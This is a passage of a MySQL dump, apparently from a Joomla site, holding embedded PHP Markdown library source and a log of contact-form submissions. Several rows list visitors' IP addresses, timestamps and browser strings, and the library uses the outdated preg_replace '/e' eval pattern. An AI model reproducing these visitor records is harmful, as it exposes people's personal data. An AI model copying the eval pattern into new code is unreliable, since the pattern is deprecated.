preg_replace(\"/\\n{2,}/\", \"\\n\\n\\n\", $list);\r\n $result = _ProcessListItems($list, $marker_any);\r\n\r\n # Trim any trailing whitespace, to put the closing `</$list_type>`\r\n # up on the preceding line, to get it past the current stupid\r\n # HTML block parser. This is a hack to work around the terrible\r\n # hack that is the HTML block parser.\r\n $result = rtrim($result);\r\n $result = \"<$list_type>\" . $result . \"</$list_type>\\n\";\r\n return $result;\r\n}\r\nfunction _DoLists_callback_nested($matches) {\r\n # Re-usable patterns to match list item bullets and number markers:\r\n $marker_ul = \'[*+-]\';\r\n $marker_ol = \'\\d+[.]\';\r\n $marker_any = \"(?:$marker_ul|$marker_ol)\";\r\n\r\n $list = $matches[1];\r\n $list_type = preg_match(\"/$marker_ul/\", $matches[3]) ? \"ul\" : \"ol\";\r\n\r\n $marker_any = ( $list_type == \"ul\" ? $marker_ul : $marker_ol );\r\n\r\n # Turn double returns into triple returns, so that we can make a\r\n # paragraph for the last item in a list, if necessary:\r\n $list = preg_replace(\"/\\n{2,}/\", \"\\n\\n\\n\", $list);\r\n $result = _ProcessListItems($list, $marker_any);\r\n $result = \"<$list_type>\\n\" . $result . \"</$list_type>\\n\";\r\n return $result;\r\n}\r\n\r\n\r\nfunction _ProcessListItems($list_str, $marker_any) {\r\n#\r\n# Process the contents of a single ordered or unordered list, splitting it\r\n# into individual list items.\r\n#\r\n global $md_list_level;\r\n\r\n # The $md_list_level global keeps track of when we\'re inside a list.\r\n # Each time we enter a list, we increment it; when we leave a list,\r\n # we decrement. If it\'s zero, we\'re not in a list anymore.\r\n #\r\n # We do this because when we\'re not inside a list, we want to treat\r\n # something like this:\r\n #\r\n # I recommend upgrading to version\r\n # 8. Oops, now this line is treated\r\n # as a sub-list.\r\n #\r\n # As a single paragraph, despite the fact that the second line starts\r\n # with a digit-period-space sequence.\r\n #\r\n # Whereas when we\'re inside a list (or sub-list), that line will be\r\n # treated as the start of a sub-list. What a kludge, huh? This is\r\n # an aspect of Markdown\'s syntax that\'s hard to parse perfectly\r\n # without resorting to mind-reading. Perhaps the solution is to\r\n # change the syntax rules such that sub-lists must start with a\r\n # starting cardinal number; e.g. \"1.\" or \"a.\".\r\n\r\n $md_list_level++;\r\n\r\n # trim trailing blank lines:\r\n $list_str = preg_replace(\"/\\n{2,}\\\\z/\", \"\\n\", $list_str);\r\n\r\n $list_str = preg_replace_callback(\'{\r\n (\\n)? # leading line = $1\r\n (^[ \\t]*) # leading whitespace = $2\r\n (\'.$marker_any.\') [ \\t]+ # list marker = $3\r\n ((?s:.+?) # list item text = $4\r\n (\\n{1,2}))\r\n (?= \\n* (\\z | \\2 (\'.$marker_any.\') [ \\t]+))\r\n }xm\',\r\n \'_ProcessListItems_callback\', $list_str);\r\n\r\n $md_list_level--;\r\n return $list_str;\r\n}\r\nfunction _ProcessListItems_callback($matches) {\r\n $item = $matches[4];\r\n $leading_line =& $matches[1];\r\n $leading_space =& $matches[2];\r\n\r\n if ($leading_line || preg_match(\'/\\n{2,}/\', $item)) {\r\n $item = _RunBlockGamut(_Outdent($item));\r\n }\r\n else {\r\n # Recursion for sub-lists:\r\n $item = _DoLists(_Outdent($item));\r\n $item = preg_replace(\'/\\n+$/\', \'\', $item);\r\n $item = _RunSpanGamut($item);\r\n }\r\n\r\n return \"<li>\" . $item . \"</li>\\n\";\r\n}\r\n\r\n\r\nfunction _DoCodeBlocks($text) {\r\n#\r\n# Process Markdown `<pre><code>` blocks.\r\n#\r\n global $md_tab_width;\r\n $text = preg_replace_callback(\"{\r\n (?:\\\\n\\\\n|\\\\A)\r\n ( # $1 = the code block -- one or more lines, starting with a space/tab\r\n (?:\r\n (?:[ ]\\{$md_tab_width} | \\\\t) # Lines must start with a tab or a tab-width of spaces\r\n .*\\\\n+\r\n )+\r\n )\r\n ((?=^[ ]{0,$md_tab_width}\\\\S)|\\\\Z) # Lookahead for non-space at line-start, or end of doc\r\n }xm\",\r\n \'_DoCodeBlocks_callback\', $text);\r\n\r\n return $text;\r\n}\r\nfunction _DoCodeBlocks_callback($matches) {\r\n $codeblock = $matches[1];\r\n\r\n $codeblock = _EncodeCode(_Outdent($codeblock));\r\n// $codeblock = _Detab($codeblock);\r\n # trim leading newlines and trailing whitespace\r\n $codeblock = preg_replace(array(\'/\\A\\n+/\', \'/\\s+\\z/\'), \'\', $codeblock);\r\n\r\n $result = \"\\n\\n<pre><code>\" . $codeblock . \"\\n</code></pre>\\n\\n\";\r\n\r\n return $result;\r\n}\r\n\r\n\r\nfunction _DoCodeSpans($text) {\r\n#\r\n# * Backtick quotes are used for <code></code> spans.\r\n#\r\n# * You can use multiple backticks as the delimiters if you want to\r\n# include literal backticks in the code span. So, this input:\r\n#\r\n# Just type ``foo `bar` baz`` at the prompt.\r\n#\r\n# Will translate to:\r\n#\r\n# <p>Just type <code>foo `bar` baz</code> at the prompt.</p>\r\n#\r\n# There\'s no arbitrary limit to the number of backticks you\r\n# can use as delimters. If you need three consecutive backticks\r\n# in your code, use four for delimiters, etc.\r\n#\r\n# * You can use spaces to get literal backticks at the edges:\r\n#\r\n# ... type `` `bar` `` ...\r\n#\r\n# Turns to:\r\n#\r\n# ... type <code>`bar`</code> ...\r\n#\r\n $text = preg_replace_callback(\'@\r\n (?<!\\\\\\) # Character before opening ` can\\\'t be a backslash\r\n (`+) # $1 = Opening run of `\r\n (.+?) # $2 = The code block\r\n (?<!`)\r\n \\1 # Matching closer\r\n (?!`)\r\n @xs\',\r\n \'_DoCodeSpans_callback\', $text);\r\n\r\n return $text;\r\n}\r\nfunction _DoCodeSpans_callback($matches) {\r\n $c = $matches[2];\r\n $c = preg_replace(\'/^[ \\t]*/\', \'\', $c); # leading whitespace\r\n $c = preg_replace(\'/[ \\t]*$/\', \'\', $c); # trailing whitespace\r\n $c = _EncodeCode($c);\r\n return \"<code>$c</code>\";\r\n}\r\n\r\n\r\nfunction _EncodeCode($_) {\r\n#\r\n# Encode/escape certain characters inside Markdown code runs.\r\n# The point is that in code, these characters are literals,\r\n# and lose their special Markdown meanings.\r\n#\r\n global $md_escape_table;\r\n\r\n # Encode all ampersands; HTML entities are not\r\n # entities within a Markdown code span.\r\n $_ = str_replace(\'&\', \'&\', $_);\r\n\r\n # Do the angle bracket song and dance:\r\n $_ = str_replace(array(\'<\', \'>\'),\r\n array(\'<\', \'>\'), $_);\r\n\r\n # Now, escape characters that are magic in Markdown:\r\n $_ = str_replace(array_keys($md_escape_table),\r\n array_values($md_escape_table), $_);\r\n\r\n return $_;\r\n}\r\n\r\n\r\nfunction _DoItalicsAndBold($text) {\r\n # <strong> must go first:\r\n $text = preg_replace(\'{\r\n ( # $1: Marker\r\n (?<!\\*\\*) \\*\\* | # (not preceded by two chars of\r\n (?<!__) __ # the same marker)\r\n )\r\n (?=\\S) # Not followed by whitespace\r\n (?!\\1) # or two others marker chars.\r\n ( # $2: Content\r\n (?:\r\n [^*_]+? # Anthing not em markers.\r\n |\r\n # Balence any regular emphasis inside.\r\n ([*_]) (?=\\S) .+? (?<=\\S) \\3 # $3: em char (* or _)\r\n |\r\n (?! \\1 ) . # Allow unbalenced * and _.\r\n )+?\r\n )\r\n (?<=\\S) \\1 # End mark not preceded by whitespace.\r\n }sx\',\r\n \'<strong>\\2</strong>\', $text);\r\n # Then <em>:\r\n $text = preg_replace(\r\n \'{ ( (?<!\\*)\\* | (?<!_)_ ) (?=\\S) (?! \\1) (.+?) (?<=\\S) \\1 }sx\',\r\n \'<em>\\2</em>\', $text);\r\n\r\n return $text;\r\n}\r\n\r\n\r\nfunction _DoBlockQuotes($text) {\r\n $text = preg_replace_callback(\'/\r\n ( # Wrap whole match in $1\r\n (\r\n ^[ \\t]*>[ \\t]? # \">\" at the start of a line\r\n .+\\n # rest of the first line\r\n (.+\\n)* # subsequent consecutive lines\r\n \\n* # blanks\r\n )+\r\n )\r\n /xm\',\r\n \'_DoBlockQuotes_callback\', $text);\r\n\r\n return $text;\r\n}\r\nfunction _DoBlockQuotes_callback($matches) {\r\n $bq = $matches[1];\r\n # trim one level of quoting - trim whitespace-only lines\r\n $bq = preg_replace(array(\'/^[ \\t]*>[ \\t]?/m\', \'/^[ \\t]+$/m\'), \'\', $bq);\r\n $bq = _RunBlockGamut($bq); # recurse\r\n\r\n $bq = preg_replace(\'/^/m\', \" \", $bq);\r\n # These leading spaces screw with <pre> content, so we need to fix that:\r\n $bq = preg_replace_callback(\'{(\\s*<pre>.+?</pre>)}sx\',\r\n \'_DoBlockQuotes_callback2\', $bq);\r\n\r\n return \"<blockquote>\\n$bq\\n</blockquote>\\n\\n\";\r\n}\r\nfunction _DoBlockQuotes_callback2($matches) {\r\n $pre = $matches[1];\r\n $pre = preg_replace(\'/^ /m\', \'\', $pre);\r\n return $pre;\r\n}\r\n\r\n\r\nfunction _FormParagraphs($text) {\r\n#\r\n# Params:\r\n# $text - string to process with html <p> tags\r\n#\r\n global $md_html_blocks;\r\n\r\n # Strip leading and trailing lines:\r\n $text = preg_replace(array(\'/\\A\\n+/\', \'/\\n+\\z/\'), \'\', $text);\r\n\r\n $grafs = preg_split(\'/\\n{2,}/\', $text, -1, PREG_SPLIT_NO_EMPTY);\r\n\r\n #\r\n # Wrap <p> tags.\r\n #\r\n foreach ($grafs as $key => $value) {\r\n if (!isset( $md_html_blocks[$value] )) {\r\n $value = _RunSpanGamut($value);\r\n $value = preg_replace(\'/^([ \\t]*)/\', \'<p>\', $value);\r\n $value .= \"</p>\";\r\n $grafs[$key] = $value;\r\n }\r\n }\r\n\r\n #\r\n # Unhashify HTML blocks\r\n #\r\n foreach ($grafs as $key => $value) {\r\n if (isset( $md_html_blocks[$value] )) {\r\n $grafs[$key] = $md_html_blocks[$value];\r\n }\r\n }\r\n\r\n return implode(\"\\n\\n\", $grafs);\r\n}\r\n\r\n\r\nfunction _EncodeAmpsAndAngles($text) {\r\n# Smart processing for ampersands and angle brackets that need to be encoded.\r\n\r\n # Ampersand-encoding based entirely on Nat Irons\'s Amputator MT plugin:\r\n # http://bumppo.net/projects/amputator/\r\n $text = preg_replace(\'/&(?!#?[xX]?(?:[0-9a-fA-F]+|\\w+);)/\',\r\n \'&\', $text);;\r\n\r\n # Encode naked <\'s\r\n $text = preg_replace(\'{<(?![a-z/?\\$!])}i\', \'<\', $text);\r\n\r\n return $text;\r\n}\r\n\r\n\r\nfunction _EncodeBackslashEscapes($text) {\r\n#\r\n# Parameter: String.\r\n# Returns: The string, with after processing the following backslash\r\n# escape sequences.\r\n#\r\n global $md_escape_table, $md_backslash_escape_table;\r\n # Must process escaped backslashes first.\r\n return str_replace(array_keys($md_backslash_escape_table),\r\n array_values($md_backslash_escape_table), $text);\r\n}\r\n\r\n\r\nfunction _DoAutoLinks($text) {\r\n $text = preg_replace(\"!<((https?|ftp):[^\'\\\">\\\\s]+)>!\",\r\n \'<a href=\"\\1\">\\1</a>\', $text);\r\n\r\n # Email addresses: <address@domain.foo>\r\n $text = preg_replace(\'{\r\n <\r\n (?:mailto:)?\r\n (\r\n [-.\\w]+\r\n \\@\r\n [-a-z0-9]+(\\.[-a-z0-9]+)*\\.[a-z]+\r\n )\r\n >\r\n }exi\',\r\n \"_EncodeEmailAddress(_UnescapeSpecialChars(_UnslashQuotes(\'\\\\1\')))\",\r\n $text);\r\n\r\n return $text;\r\n}\r\n\r\n\r\nfunction _EncodeEmailAddress($addr) {\r\n#\r\n# Input: an email address, e.g. \"foo@example.com\"\r\n#\r\n# Output: the email address as a mailto link, with each character\r\n# of the address encoded as either a decimal or hex entity, in\r\n# the hopes of foiling most address harvesting spam bots. E.g.:\r\n#\r\n# <a href=\"mailto:foo@e\r\n# xample.com\">foo\r\n# @example.com</a>\r\n#\r\n# Based by a filter by Matthew Wickline, posted to the BBEdit-Talk\r\n# mailing list: <http://tinyurl.com/yu7ue>\r\n#\r\n $addr = \"mailto:\" . $addr;\r\n $length = strlen($addr);\r\n\r\n # leave \':\' alone (to spot mailto: later)\r\n $addr = preg_replace_callback(\'/([^\\:])/\',\r\n \'_EncodeEmailAddress_callback\', $addr);\r\n\r\n $addr = \"<a href=\\\"$addr\\\">$addr</a>\";\r\n # strip the mailto: from the visible part\r\n $addr = preg_replace(\'/\">.+?:/\', \'\">\', $addr);\r\n\r\n return $addr;\r\n}\r\nfunction _EncodeEmailAddress_callback($matches) {\r\n $char = $matches[1];\r\n $r = rand(0, 100);\r\n # roughly 10% raw, 45% hex, 45% dec\r\n # \'@\' *must* be encoded. I insist.\r\n if ($r > 90 && $char != \'@\') return $char;\r\n if ($r < 45) return \'&#x\'.dechex(ord($char)).\';\';\r\n return \'&#\'.ord($char).\';\';\r\n}\r\n\r\n\r\nfunction _UnescapeSpecialChars($text) {\r\n#\r\n# Swap back in all the special characters we\'ve hidden.\r\n#\r\n global $md_escape_table;\r\n return str_replace(array_values($md_escape_table),\r\n array_keys($md_escape_table), $text);\r\n}\r\n\r\n\r\n# _TokenizeHTML is shared between PHP Markdown and PHP SmartyPants.\r\n# We only define it if it is not already defined.\r\nif (!function_exists(\'_TokenizeHTML\')) :\r\nfunction _TokenizeHTML($str) {\r\n#\r\n# Parameter: String containing HTML markup.\r\n# Returns: An array of the tokens comprising the input\r\n# string. Each token is either a tag (possibly with nested,\r\n# tags contained therein, such as <a href=\"<MTFoo>\">, or a\r\n# run of text between tags. Each element of the array is a\r\n# two-element array; the first is either \'tag\' or \'text\';\r\n# the second is the actual value.\r\n#\r\n#\r\n# Regular expression derived from the _tokenize() subroutine in\r\n# Brad Choate\'s MTRegex plugin.\r\n# <http://www.bradchoate.com/past/mtregex.php>\r\n#\r\n $index = 0;\r\n $tokens = array();\r\n\r\n $match = \'(?s:<!(?:--.*?--\\s*)+>)|\'. # comment\r\n \'(?s:<\\?.*?\\?>)|\'. # processing instruction\r\n # regular tags\r\n \'(?:<[/!$]?[-a-zA-Z0-9:]+\\b(?>[^\"\\\'>]+|\"[^\"]*\"|\\\'[^\\\']*\\\')*>)\';\r\n\r\n $parts = preg_split(\"{($match)}\", $str, -1, PREG_SPLIT_DELIM_CAPTURE);\r\n\r\n foreach ($parts as $part) {\r\n if (++$index % 2 && $part != \'\')\r\n $tokens[] = array(\'text\', $part);\r\n else\r\n $tokens[] = array(\'tag\', $part);\r\n }\r\n\r\n return $tokens;\r\n}\r\nendif;\r\n\r\n\r\nfunction _Outdent($text) {\r\n#\r\n# Remove one level of line-leading tabs or spaces\r\n#\r\n global $md_tab_width;\r\n return preg_replace(\"/^(\\\\t|[ ]{1,$md_tab_width})/m\", \"\", $text);\r\n}\r\n\r\n\r\nfunction _Detab($text) {\r\n#\r\n# Replace tabs with the appropriate amount of space.\r\n#\r\n global $md_tab_width;\r\n\r\n # For each line we separate the line in blocks delemited by\r\n # tab characters. Then we reconstruct every line by adding the\r\n # appropriate number of space between each blocks.\r\n\r\n $lines = explode(\"\\n\", $text);\r\n $text = \"\";\r\n\r\n foreach ($lines as $line) {\r\n # Split in blocks.\r\n $blocks = explode(\"\\t\", $line);\r\n # Add each blocks to the line.\r\n $line = $blocks[0];\r\n unset($blocks[0]); # Do not add first block twice.\r\n foreach ($blocks as $block) {\r\n # Calculate amount of space, insert spaces, insert block.\r\n $amount = $md_tab_width - strlen($line) % $md_tab_width;\r\n $line .= str_repeat(\" \", $amount) . $block;\r\n }\r\n $text .= \"$line\\n\";\r\n }\r\n return $text;\r\n}\r\n\r\n\r\nfunction _UnslashQuotes($text) {\r\n#\r\n# This function is useful to remove automaticaly slashed double quotes\r\n# when using preg_replace and evaluating an expression.\r\n# Parameter: String.\r\n# Returns: The string with any slash-double-quote (\\\") sequence replaced\r\n# by a single double quote.\r\n#\r\n return str_replace(\'\\\"\', \'\"\', $text);\r\n}\r\n\r\n\r\n/*\r\n\r\nPHP Markdown\r\n============\r\n\r\nDescription\r\n-----------\r\n\r\nThis is a PHP translation of the original Markdown formatter written in\r\nPerl by John Gruber.\r\n\r\nMarkdown is a text-to-HTML filter; it translates an easy-to-read /\r\neasy-to-write structured text format into HTML. Markdown\'s text format\r\nis most similar to that of plain text email, and supports features such\r\nas headers, *emphasis*, code blocks, blockquotes, and links.\r\n\r\nMarkdown\'s syntax is designed not as a generic markup language, but\r\nspecifically to serve as a front-end to (X)HTML. You can use span-level\r\nHTML tags anywhere in a Markdown document, and you can use block level\r\nHTML tags (like <div> and <table> as well).\r\n\r\nFor more information about Markdown\'s syntax, see:\r\n\r\n<http://daringfireball.net/projects/markdown/>\r\n\r\n\r\nBugs\r\n----\r\n\r\nTo file bug reports please send email to:\r\n\r\n<michel.fortin@michelf.com>\r\n\r\nPlease include with your report: (1) the example input; (2) the output you\r\nexpected; (3) the output Markdown actually produced.\r\n\r\n\r\nVersion History\r\n---------------\r\n\r\nSee the readme file for detailed release notes for this version.\r\n\r\n1.0.1b - 6 Jun 2005\r\n\r\n1.0.1a - 15 Apr 2005\r\n\r\n1.0.1 - 16 Dec 2004\r\n\r\n1.0 - 21 Aug 2004\r\n\r\n\r\nAuthor & Contributors\r\n---------------------\r\n\r\nOriginal Perl version by John Gruber\r\n<http://daringfireball.net/>\r\n\r\nPHP port and other contributions by Michel Fortin\r\n<http://www.michelf.com/>\r\n\r\n\r\nCopyright and License\r\n---------------------\r\n\r\nCopyright (c) 2004-2005 Michel Fortin\r\n<http://www.michelf.com/>\r\nAll rights reserved.\r\n\r\nCopyright (c) 2003-2004 John Gruber\r\n<http://daringfireball.net/>\r\nAll rights reserved.\r\n\r\nRedistribution and use in source and binary forms, with or without\r\nmodification, are permitted provided that the following conditions are\r\nmet:\r\n\r\n* Redistributions of source code must retain the above copyright notice,\r\n this list of conditions and the following disclaimer.\r\n\r\n* Redistributions in binary form must reproduce the above copyright\r\n notice, this list of conditions and the following disclaimer in the\r\n documentation and/or other materials provided with the distribution.\r\n\r\n* Neither the name \"Markdown\" nor the names of its contributors may\r\n be used to endorse or promote products derived from this software\r\n without specific prior written permission.\r\n\r\nThis software is provided by the copyright holders and contributors \"as\r\nis\" and any express or implied warranties, including, but not limited\r\nto, the implied warranties of merchantability and fitness for a\r\nparticular purpose are disclaimed. In no event shall the copyright owner\r\nor contributors be liable for any direct, indirect, incidental, special,\r\nexemplary, or consequential damages (including, but not limited to,\r\nprocurement of substitute goods or services; loss of use, data, or\r\nprofits; or business interruption) however caused and on any theory of\r\nliability, whether in contract, strict liability, or tort (including\r\nnegligence or otherwise) arising in any way out of the use of this\r\nsoftware, even if advised of the possibility of such damage.\r\n\r\n*/');
/*!40000 ALTER TABLE `vzx9b_facileforms_pieces` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_facileforms_records`
--
DROP TABLE IF EXISTS `vzx9b_facileforms_records`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_facileforms_records` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`submitted` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`form` int(11) NOT NULL DEFAULT 0,
`title` varchar(255) NOT NULL DEFAULT '',
`name` varchar(255) NOT NULL DEFAULT '',
`ip` varchar(30) NOT NULL DEFAULT '',
`browser` varchar(255) NOT NULL DEFAULT '',
`opsys` varchar(255) NOT NULL DEFAULT '',
`provider` varchar(255) NOT NULL DEFAULT '',
`viewed` tinyint(1) NOT NULL DEFAULT 0,
`exported` tinyint(1) NOT NULL DEFAULT 0,
`archived` tinyint(1) NOT NULL DEFAULT 0,
`user_id` int(11) NOT NULL DEFAULT 0,
`username` varchar(255) NOT NULL DEFAULT '',
`user_full_name` varchar(255) NOT NULL DEFAULT '',
`paypal_tx_id` varchar(255) NOT NULL DEFAULT '',
`paypal_payment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`paypal_testaccount` tinyint(1) NOT NULL DEFAULT 0,
`paypal_download_tries` int(11) NOT NULL DEFAULT 0,
`opted` tinyint(1) NOT NULL DEFAULT 0,
`opt_ip` varchar(255) NOT NULL DEFAULT '',
`opt_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`opt_token` varchar(255) NOT NULL DEFAULT '',
PRIMARY KEY (`id`),
KEY `opted` (`opted`),
KEY `opt_ip` (`opt_ip`),
KEY `opt_date` (`opt_date`),
KEY `opt_token` (`opt_token`)
) ENGINE=InnoDB AUTO_INCREMENT=73 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_facileforms_records`
--
LOCK TABLES `vzx9b_facileforms_records` WRITE;
/*!40000 ALTER TABLE `vzx9b_facileforms_records` DISABLE KEYS */;
INSERT INTO `vzx9b_facileforms_records` VALUES (1,'2017-01-24 11:14:20',1,'Contact','Contact','169.1.174.51','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:50.0) Gecko/20100101 Firefox/50.0','mac','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(2,'2017-01-24 11:18:26',1,'Contact','Contact','169.1.174.51','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:50.0) Gecko/20100101 Firefox/50.0','mac','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(3,'2017-01-24 11:22:48',1,'Contact','Contact','169.1.174.51','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:50.0) Gecko/20100101 Firefox/50.0','mac','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(4,'2017-01-24 13:20:25',2,'Contactnew','Contactnew','169.1.174.51','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:50.0) Gecko/20100101 Firefox/50.0','mac','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(5,'2017-01-24 13:26:01',2,'Contactnew','Contactnew','169.1.174.51','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:50.0) Gecko/20100101 Firefox/50.0','mac','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(6,'2017-01-24 13:27:40',2,'Contactnew','Contactnew','169.1.174.51','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:50.0) Gecko/20100101 Firefox/50.0','mac','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(7,'2017-01-24 13:37:58',2,'Contactnew','Contactnew','169.1.174.51','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:50.0) Gecko/20100101 Firefox/50.0','mac','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(8,'2017-02-06 10:48:47',2,'Contactnew','Contactnew','169.0.116.109','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:51.0) Gecko/20100101 Firefox/51.0','mac','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(9,'2017-02-10 07:26:25',2,'Contactnew','Contactnew','169.0.53.234','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:51.0) Gecko/20100101 Firefox/51.0','mac','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(10,'2017-04-17 01:30:06',2,'Contactnew','Contactnew','105.15.95.174','Mozilla/5.0 (Linux; Android 5.1; VFD 200 Build/LMY47D) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.76 Mobile Safari/537.36','unix','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(11,'2017-04-28 12:08:48',2,'Contactnew','Contactnew','122.162.86.227','Mozilla/5.0 (Windows NT 6.1; rv:37.0) Gecko/20100101 Firefox/37.0','win','Unknown',1,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(12,'2017-07-24 15:40:17',2,'Contactnew','Contactnew','178.123.198.87','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 OPR/44.0.2510.1449','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(13,'2017-10-12 11:40:24',2,'Contactnew','Contactnew','41.13.198.128','Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG SM-A300FU/A300FUXXS1BPE1 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Mobile Safari/537.36','unix','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(14,'2017-10-16 14:41:39',2,'Contactnew','Contactnew','154.69.176.36','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(15,'2017-11-18 07:58:25',2,'Contactnew','Contactnew','69.16.145.247','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:25.0) Gecko/20100101 Firefox/25.0','mac','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(16,'2017-12-11 07:01:47',2,'Contactnew','Contactnew','103.212.147.68','Mozilla/5.0 (Windows NT 6.1; rv:37.0) Gecko/20100101 Firefox/37.0','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(17,'2017-12-11 16:36:16',2,'Contactnew','Contactnew','185.191.204.12','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(18,'2018-01-01 06:56:13',2,'Contactnew','Contactnew','122.162.72.128','Mozilla/5.0 (Windows NT 6.1; rv:37.0) Gecko/20100101 Firefox/37.0','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(19,'2018-01-23 20:10:35',2,'Contactnew','Contactnew','105.228.180.219','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(20,'2018-02-14 05:03:12',2,'Contactnew','Contactnew','178.137.84.20','Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(21,'2018-02-14 05:12:54',2,'Contactnew','Contactnew','195.22.126.23','Mozilla/5.0 (Windows NT 6.1; Win64; rv:31.0) Gecko/20100101 Firefox/31.0','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(22,'2018-02-14 07:53:30',2,'Contactnew','Contactnew','195.22.126.25','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(23,'2018-02-14 12:16:24',2,'Contactnew','Contactnew','195.22.126.38','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(24,'2018-02-14 14:25:25',2,'Contactnew','Contactnew','195.22.126.26','Mozilla/5.0 (Windows NT 7.1; Win64; rv:43.1) Gecko/20100101 Firefox/43.1','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(25,'2018-02-14 15:12:38',2,'Contactnew','Contactnew','169.0.73.246','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:58.0) Gecko/20100101 Firefox/58.0','mac','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(26,'2018-02-15 04:46:57',2,'Contactnew','Contactnew','195.22.126.22','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(27,'2018-02-18 08:15:52',2,'Contactnew','Contactnew','195.22.126.37','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(28,'2018-02-18 08:33:47',2,'Contactnew','Contactnew','169.0.73.246','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:58.0) Gecko/20100101 Firefox/58.0','mac','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(29,'2018-06-30 07:48:44',2,'Contactnew','Contactnew','46.119.113.139','Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0','win','Unknown',0,0,0,0,'-','-','','0000-00-00 